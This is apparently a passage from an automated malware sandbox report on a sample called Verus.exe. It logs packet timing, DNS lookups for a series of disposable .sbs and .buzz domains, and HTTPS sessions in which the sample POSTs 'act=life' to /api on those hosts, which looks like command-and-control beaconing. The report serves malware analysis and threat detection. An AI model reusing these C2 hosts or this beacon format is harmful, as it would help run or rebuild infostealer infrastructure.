Oct 14, 2024 09:41:21.467283964 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.467760086 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.469002962 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:21.469053030 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:21.469114065 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.927956104 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.928067923 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.928131104 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:21.933027029 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:21.933072090 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.933104992 CEST	49739	443	192.168.2.4	172.67.152.13
Oct 14, 2024 09:41:21.933120966 CEST	443	49739	172.67.152.13	192.168.2.4
Oct 14, 2024 09:41:21.950958967 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:21.951010942 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:21.951071978 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:21.951479912 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:21.951508045 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.430788994 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.430952072 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:22.435312033 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:22.435338974 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.435735941 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.444118023 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:22.444118023 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:22.444207907 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.865674019 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.865897894 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.866008043 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:22.866326094 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:22.866326094 CEST	49741	443	192.168.2.4	172.67.205.156
Oct 14, 2024 09:41:22.866350889 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.866363049 CEST	443	49741	172.67.205.156	192.168.2.4
Oct 14, 2024 09:41:22.906192064 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:22.906233072 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:22.906306028 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:22.906949997 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:22.906965017 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.418759108 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.419075012 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:23.420475960 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:23.420501947 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.421013117 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.422410011 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:23.422446012 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:23.422636986 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.863419056 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.863647938 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.863715887 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:23.863787889 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:23.863830090 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.863861084 CEST	49743	443	192.168.2.4	172.67.140.193
Oct 14, 2024 09:41:23.863876104 CEST	443	49743	172.67.140.193	192.168.2.4
Oct 14, 2024 09:41:23.880709887 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:23.880747080 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:23.880805016 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:23.881117105 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:23.881128073 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.361320019 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.361546040 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:24.364856958 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:24.364870071 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.365253925 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.374089003 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:24.374140024 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:24.374458075 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.794476986 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.794713020 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.794780970 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:24.794862032 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:24.794882059 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.794898033 CEST	49745	443	192.168.2.4	172.67.173.224
Oct 14, 2024 09:41:24.794905901 CEST	443	49745	172.67.173.224	192.168.2.4
Oct 14, 2024 09:41:24.842199087 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:24.842243910 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:24.842323065 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:24.842675924 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:24.842689991 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.327877045 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.328290939 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:25.329565048 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:25.329590082 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.329962969 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.331068993 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:25.331098080 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:25.331151009 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.755207062 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.755311966 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.755423069 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:25.755755901 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:25.755755901 CEST	49746	443	192.168.2.4	172.67.141.136
Oct 14, 2024 09:41:25.755786896 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.755806923 CEST	443	49746	172.67.141.136	192.168.2.4
Oct 14, 2024 09:41:25.770857096 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:25.770896912 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:25.771161079 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:25.771285057 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:25.771298885 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.247353077 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.247416973 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:26.249511957 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:26.249516964 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.249708891 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.250771999 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:26.250771999 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:26.250821114 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.721333981 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.721398115 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.721462011 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:26.721813917 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:26.721822023 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.721832991 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 14, 2024 09:41:26.721837044 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 14, 2024 09:41:26.733858109 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:26.733946085 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:26.734031916 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:26.734345913 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:26.734381914 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:27.436997890 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:27.437072992 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:27.438967943 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:27.438992023 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:27.439217091 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:27.440509081 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:27.487402916 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.061394930 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.061414003 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.061450958 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.061516047 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.061556101 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.061582088 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.183851957 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.183872938 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.183949947 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.184005976 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.184036016 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.184079885 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.190717936 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.190776110 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.190783978 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.190794945 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.190867901 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.190984964 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.190984964 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.192559004 CEST	49748	443	192.168.2.4	104.102.49.254
Oct 14, 2024 09:41:28.192575932 CEST	443	49748	104.102.49.254	192.168.2.4
Oct 14, 2024 09:41:28.202399969 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.202488899 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.202595949 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.202877998 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.202919006 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.671761990 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.671840906 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.673321009 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.673357964 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.673587084 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.674807072 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.674849033 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.674895048 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.784131050 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.784168959 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.784241915 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.784265995 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.784291029 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.784329891 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.784358978 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.784518003 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.784545898 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.784579039 CEST	49749	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.784594059 CEST	443	49749	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.854022980 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.854100943 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:28.854188919 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.854464054 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:28.854500055 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.337938070 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.338047028 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:29.339346886 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:29.339374065 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.339601994 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.340753078 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:29.340789080 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:29.340959072 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.769236088 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.769300938 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.769377947 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:29.769539118 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:29.769589901 CEST	443	49750	104.21.53.8	192.168.2.4
Oct 14, 2024 09:41:29.769642115 CEST	49750	443	192.168.2.4	104.21.53.8
Oct 14, 2024 09:41:29.769659042 CEST	443	49750	104.21.53.8	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 09:41:18.811662912 CEST	59316	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:18.826179981 CEST	53	59316	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:19.948249102 CEST	63793	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:19.960006952 CEST	53	63793	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:20.913836002 CEST	57419	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:20.922637939 CEST	53	57419	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:20.923975945 CEST	59480	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:20.938632965 CEST	53	59480	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:21.935683966 CEST	61189	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:21.950117111 CEST	53	61189	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:22.882834911 CEST	54020	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:22.905225992 CEST	53	54020	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:23.865114927 CEST	55426	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:23.879785061 CEST	53	55426	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:24.826858044 CEST	63303	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:24.840157986 CEST	53	63303	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:25.756813049 CEST	59559	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:25.770072937 CEST	53	59559	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:26.724972010 CEST	51493	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:26.733023882 CEST	53	51493	1.1.1.1	192.168.2.4
Oct 14, 2024 09:41:28.192564011 CEST	54846	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:41:28.201606989 CEST	53	54846	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 09:41:18.811662912 CEST	192.168.2.4	1.1.1.1	0x43f1	Standard query (0)	enginenek.buzz	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:19.948249102 CEST	192.168.2.4	1.1.1.1	0x10f5	Standard query (0)	mathcucom.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:20.913836002 CEST	192.168.2.4	1.1.1.1	0x6e15	Standard query (0)	allocatinow.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:20.923975945 CEST	192.168.2.4	1.1.1.1	0xf630	Standard query (0)	enlargkiw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:21.935683966 CEST	192.168.2.4	1.1.1.1	0xeefa	Standard query (0)	resinedyw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:22.882834911 CEST	192.168.2.4	1.1.1.1	0xb0b0	Standard query (0)	vennurviot.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:23.865114927 CEST	192.168.2.4	1.1.1.1	0x90eb	Standard query (0)	ehticsprocw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:24.826858044 CEST	192.168.2.4	1.1.1.1	0x8199	Standard query (0)	condifendteu.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:25.756813049 CEST	192.168.2.4	1.1.1.1	0xb827	Standard query (0)	drawwyobstacw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:26.724972010 CEST	192.168.2.4	1.1.1.1	0x28af	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:28.192564011 CEST	192.168.2.4	1.1.1.1	0xbbb9	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 09:41:18.826179981 CEST	1.1.1.1	192.168.2.4	0x43f1	No error (0)	enginenek.buzz		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:18.826179981 CEST	1.1.1.1	192.168.2.4	0x43f1	No error (0)	enginenek.buzz		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:19.960006952 CEST	1.1.1.1	192.168.2.4	0x10f5	No error (0)	mathcucom.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:19.960006952 CEST	1.1.1.1	192.168.2.4	0x10f5	No error (0)	mathcucom.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:20.922637939 CEST	1.1.1.1	192.168.2.4	0x6e15	Name error (3)	allocatinow.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:20.938632965 CEST	1.1.1.1	192.168.2.4	0xf630	No error (0)	enlargkiw.sbs		172.67.152.13	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:20.938632965 CEST	1.1.1.1	192.168.2.4	0xf630	No error (0)	enlargkiw.sbs		104.21.33.249	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:21.950117111 CEST	1.1.1.1	192.168.2.4	0xeefa	No error (0)	resinedyw.sbs		172.67.205.156	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:21.950117111 CEST	1.1.1.1	192.168.2.4	0xeefa	No error (0)	resinedyw.sbs		104.21.77.78	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:22.905225992 CEST	1.1.1.1	192.168.2.4	0xb0b0	No error (0)	vennurviot.sbs		172.67.140.193	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:22.905225992 CEST	1.1.1.1	192.168.2.4	0xb0b0	No error (0)	vennurviot.sbs		104.21.46.170	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:23.879785061 CEST	1.1.1.1	192.168.2.4	0x90eb	No error (0)	ehticsprocw.sbs		172.67.173.224	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:23.879785061 CEST	1.1.1.1	192.168.2.4	0x90eb	No error (0)	ehticsprocw.sbs		104.21.30.221	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:24.840157986 CEST	1.1.1.1	192.168.2.4	0x8199	No error (0)	condifendteu.sbs		172.67.141.136	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:24.840157986 CEST	1.1.1.1	192.168.2.4	0x8199	No error (0)	condifendteu.sbs		104.21.79.35	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:25.770072937 CEST	1.1.1.1	192.168.2.4	0xb827	No error (0)	drawwyobstacw.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:25.770072937 CEST	1.1.1.1	192.168.2.4	0xb827	No error (0)	drawwyobstacw.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:26.733023882 CEST	1.1.1.1	192.168.2.4	0x28af	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:28.201606989 CEST	1.1.1.1	192.168.2.4	0xbbb9	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false
Oct 14, 2024 09:41:28.201606989 CEST	1.1.1.1	192.168.2.4	0xbbb9	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

enginenek.buzz

mathcucom.sbs

enlargkiw.sbs

resinedyw.sbs

vennurviot.sbs

ehticsprocw.sbs

condifendteu.sbs

drawwyobstacw.sbs

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	188.114.97.3	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:19 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enginenek.buzz
2024-10-14 07:41:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:19 UTC	823	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=td5ki861bgghfehn2ljgqhgt83; expires=Fri, 07 Feb 2025 01:27:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EBi7%2BW3EcavA8%2BkNrwuhKSiXqHW90BsVAvF8MZPpmuV0cStRR8%2FMz6izKXnf0oDDdJ1xlB7weVm92jDYwke4CvroebO1OTfMP0Xiii5dbpS3V1oYu8cdFD1P7zNuzl4JAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed252be80c8a-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:19 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	188.114.96.3	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:20 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mathcucom.sbs
2024-10-14 07:41:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:20 UTC	823	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2err2jclm5i61mdeepo96ommmt; expires=Fri, 07 Feb 2025 01:27:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1iKv4ad8SfABDpXJRerfnxb4%2FpbPM8b4GVqbsNDsvbDCbXr8HRNgElm19vGoKBUgAeQL%2FR%2Bh%2Bej%2FOvFN%2B5S5TmBgx4eU0NygZ80VQ%2FzMv1orAE4EBACXtjwsb4FjsE3P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed2b5d815e76-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	172.67.152.13	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:21 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enlargkiw.sbs
2024-10-14 07:41:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
